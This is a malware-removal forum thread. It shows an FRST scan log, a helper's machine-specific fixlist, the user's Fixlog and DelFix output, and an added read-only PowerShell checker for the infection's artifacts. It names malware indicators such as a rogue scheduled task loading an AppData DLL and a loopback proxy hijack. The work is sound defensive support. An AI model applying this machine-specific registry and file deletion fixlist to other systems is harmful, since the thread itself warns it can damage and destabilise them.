Task: {A27C9E40-6522-4874-B404-6587317BB031} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {FE1E3EA7-3A55-42D9-B9F4-A40D5FDEA276} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-26] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-11-23 21:08 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-11-23 21:08 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-11-23 21:08 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2012-01-10 22:12 - 2012-01-10 22:12 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3179565126-1180787063-359821708-500 - Administrator - Disabled)
Guest (S-1-5-21-3179565126-1180787063-359821708-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3179565126-1180787063-359821708-1002 - Limited - Enabled)
User (S-1-5-21-3179565126-1180787063-359821708-1000 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2015 05:17:00 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {989c0791-8944-4af3-9e28-21583bc66cc7}

Error: (01/23/2015 00:59:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2328

Start Time: 01d0365772617e5f

Termination Time: 1607

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 02:30:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc292
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x119a4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 01:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x525b84d1
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0xcc44
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 10:01:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x3a14
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 09:04:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x17a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 08:10:52 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3880

Start Time: 01d035c7218aa0dd

Termination Time: 919

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 07:29:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x292c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 07:25:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc100
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x29bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/21/2015 09:10:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3a2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (01/25/2015 11:41:11 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/25/2015 11:41:10 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 11:43:55 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/24/2015 11:41:32 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/24/2015 11:34:01 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.

Error: (01/24/2015 11:15:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 11:14:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Spybot-S&D 2 Scanner Service service failed to start due to the following error:
%%1053

Error: (01/24/2015 11:14:38 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Spybot-S&D 2 Scanner Service service to connect.

Error: (01/24/2015 11:14:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 11:14:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 560 @ 2.67GHz
Percentage of memory in use: 37%
Total physical RAM: 3509.86 MB
Available physical RAM: 2205.87 MB
Total Pagefile: 7018.01 MB
Available Pagefile: 5159.55 MB
Total Virtual: 2047.88 MB
Available Virtual: 1908.47 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.94 GB) (Free:200.4 GB) NTFS
Drive d: (RCT3) (CDROM) (Total:0.67 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: B3AF73EC)
Partition 1: (Active) - (Size=157 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================


Hi,

I am sorry, I've been travelling for more than 30h lately and wasn't able to answer in a timely manner.

Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.

Running it on another one may cause damage and render the system unstable.

Press the Windows key + R on your keyboard at the same time. Type Notepad and click OK.

  • Copy the entire content of the codebox below and paste into the Notepad document:

    start
    CreateRestorePoint:
    CloseProcesses:
    C:\Users\User\AppData\Roaming\dkpxfv.dll
    Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
    Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
    Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
    Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\TEMP:373E1720
    C:\Users\User\AppData\Roaming\qkmrs.dll
    S3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    ProxyServer: [S-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    EmptyTemp:
    end

  • Click File, Save As and type fixlist.txt as the File Name.
    Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on the FRST icon and select Run as Administrator to start the tool.

    > XP users click run after receipt of Windows Security Warning - Open File.

    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.

  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
    Please include it in your reply.

No problem, Radek.  We all have things to do.  I'm just happy someone is helping me with this problem!

I followed your instructions and here is my fixlog file:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 28-01-2015 01
Ran by User at 2015-01-28 18:24:23 Run:1
Running from C:\Users\User\Desktop\Malware stuff
Loaded Profiles: User (Available profiles: User)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Users\User\AppData\Roaming\dkpxfv.dll
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
C:\Users\User\AppData\Roaming\qkmrs.dll
S3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [s-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
EmptyTemp:
end
*****************

Restore point was successfully created.
Processes closed successfully.
"C:\Users\User\AppData\Roaming\dkpxfv.dll" => File/Directory not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimizer Pro Schedule" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BE538E25-6810-47D7-9746-96E8507E6CDE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BE538E25-6810-47D7-9746-96E8507E6CDE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BrowserSafeguard" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E919B31C-4400-4B2E-8926-FAA405BBA3E3}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E919B31C-4400-4B2E-8926-FAA405BBA3E3}" => Key deleted successfully.
C:\Windows\System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BrowserSafeguard Update Task" => Key deleted successfully.
C:\ProgramData\TEMP => ":373E1720" ADS removed successfully.
C:\Users\User\AppData\Roaming\qkmrs.dll => Moved successfully.
catchme => Service deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value deleted successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
EmptyTemp: => Removed 1.4 GB temporary data.

The system needed a reboot.

==== End of Fixlog 18:32:20 ====

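After a fix like the one above, a read-only re-check of the same artifacts is the sanity test a practitioner would want before calling the machine clean. The PowerShell script below is an added example for this thread; it is not part of the original posts and is not FRST, DelFix or Malwarebytes code. It assumes PowerShell 3.0 or later (for `Get-Content -Raw`) and an elevated prompt (for the HKLM task cache and `System32\Tasks`); the file names, task-cache location, loopback proxy, policy keys and the `catchme` service entry are taken from the fixlist and Fixlog above, and nothing is deleted.

```powershell
# Read-only re-check of the artifacts named in the fixlist above.
# Added example for this thread; not FRST, DelFix or Malwarebytes code.
# Assumes PowerShell 3.0+ and an elevated prompt. Reports only; deletes nothing.

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Check, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Check = $Check; Detail = $Detail })
}

# 1. Dropped DLLs in the roaming profile (file names taken from the fixlist)
foreach ($dll in "$env:APPDATA\dkpxfv.dll", "$env:APPDATA\qkmrs.dll") {
    if (Test-Path -LiteralPath $dll) { Add-Finding 'Dropped DLL still present' $dll }
}

# 2. Scheduled-task cache. FRST's "No Task File" means a registry entry whose task
#    XML is gone; a task whose action runs a DLL out of AppData\Roaming is the
#    pattern the fixlist removed, so report both.
$cache   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks'
$taskDir = Join-Path $env:windir 'System32\Tasks'
foreach ($key in Get-ChildItem -Path $cache -ErrorAction SilentlyContinue) {
    $taskPath = (Get-ItemProperty -Path $key.PSPath).Path
    if (-not $taskPath) { continue }
    $xmlFile = Join-Path $taskDir $taskPath.TrimStart('\')
    if (-not (Test-Path -LiteralPath $xmlFile)) {
        Add-Finding 'Task cache entry without task file' "$($key.PSChildName) $taskPath"
        continue
    }
    $xml = Get-Content -LiteralPath $xmlFile -Raw
    if ($xml -match 'AppData\\Roaming\\[^<"]*\.dll') {
        Add-Finding 'Task action runs a DLL from AppData\Roaming' $taskPath
    }
}

# 3. Alternate data stream on C:\ProgramData\TEMP. 'dir /R' lists streams on
#    directories as well as files on every Windows 7 build, so it is used here
#    instead of Get-Item -Stream.
$streams = cmd.exe /c "dir /R `"$env:ProgramData`"" 2>$null |
           Select-String -Pattern 'TEMP:[^:]+:\$DATA'
foreach ($s in $streams) { Add-Finding 'Alternate data stream' $s.Line.Trim() }

# 4. Per-user proxy pointing at the loopback interface (the fixlist's 127.0.0.1:49329)
$inet = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' `
                         -ErrorAction SilentlyContinue
if ($inet -and $inet.ProxyServer -and ($inet.ProxyServer -match '127\.0\.0\.1|localhost')) {
    Add-Finding 'Proxy points at loopback' $inet.ProxyServer
}

# 5. Policy keys FRST flagged as "Policy restriction". On a stand-alone home
#    machine these keys normally do not exist; on a domain member they are
#    legitimate, so they are reported for review, not treated as proof.
$policyKeys = 'HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer',
              'HKCU:\SOFTWARE\Policies\Microsoft\Internet Explorer',
              'HKLM:\SOFTWARE\Policies\Google'
foreach ($k in $policyKeys) {
    if (Test-Path -Path $k) { Add-Finding 'Policy key present (review values)' $k }
}

# 6. Leftover driver service entry from the fixlist. It is a kernel driver, so
#    the registry is checked rather than Get-Service (which lists Win32 services only).
if (Test-Path -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\catchme') {
    Add-Finding 'Leftover driver service' 'catchme'
}

if ($findings.Count -eq 0) {
    'No fixlist artifacts found.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it from an elevated PowerShell prompt after the reboot FRST asked for; an empty result matches the "deleted successfully" lines in the Fixlog, and any row it does print names the exact artifact to look at again. The task-cache check is deliberately broader than the four GUIDs in the fixlist, so it will also surface any other task that survived with a missing XML file.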

Radek, my system is running *much* better I can tell!  I appreciate all the advice and direction you provided.

I've been noticing that my CPU usage is very low...most of the time at 0% and my memory usage is usually around 35%.

I did have a problem this morning where my cpu was jumping all around and never got below 50% with the memory usage around 80%.  It looked like I had an Iexplorer process hogging up everything.  I restarted my system and everything went back to normal.  (0% cpu and 35% memory).

I ran malwarebytes free and it found nothing.

Thanks!!!


Hi and sorry for the delay, I blame it on the jetlag.

Clean with DelFix

Please download DelFix by Xplode and save it to your desktop.

  • Right-click on the DelFix icon and select Run as Administrator to start the tool.
  • Ensure that Remove disinfection tools, Purge system restore and Reset system settings are checked.
  • Push Run.
  • When finished, it will display a notepad report.
    Include it for my review.

Please also manually reboot your machine after posting your logfile.


No problem Radek,

Here is my Log file:

# DelFix v10.8 - Logfile created 04/02/2015 at 07:32:04
# Updated 29/07/2014 by Xplode
# Username : User - USER-PC
# Operating System : Windows 7 Professional Service Pack 1 (32 bits)

~ Removing disinfection tools ...

Deleted : C:\Qoobox
Deleted : C:\FRST
Deleted : C:\ComboFix.txt
Deleted : C:\TDSSKiller.3.0.0.44_01.02.2015_12.10.32_log.txt
Deleted : C:\TDSSKiller.3.0.0.44_24.01.2015_13.11.57_log.txt
Deleted : C:\Windows\grep.exe
Deleted : C:\Windows\PEV.exe
Deleted : C:\Windows\NIRCMD.exe
Deleted : C:\Windows\MBR.exe
Deleted : C:\Windows\SED.exe
Deleted : C:\Windows\SWREG.exe
Deleted : C:\Windows\SWSC.exe
Deleted : C:\Windows\SWXCACLS.exe
Deleted : C:\Windows\Zip.exe
Deleted : HKLM\SOFTWARE\Swearware
Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\combofix.exe

~ Cleaning system restore ...

Deleted : RP #188 [Configured PowerDVD | 01/24/2015 23:17:02]
Deleted : RP #190 [Revo Uninstaller's restore point - Battle.net | 01/24/2015 23:21:57]
Deleted : RP #191 [Windows Update | 01/27/2015 04:33:27]
Deleted : RP #193 [Restore Point Created by FRST | 01/29/2015 00:24:27]
Deleted : RP #194 [installed AVG 2015 | 02/04/2015 04:20:19]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########

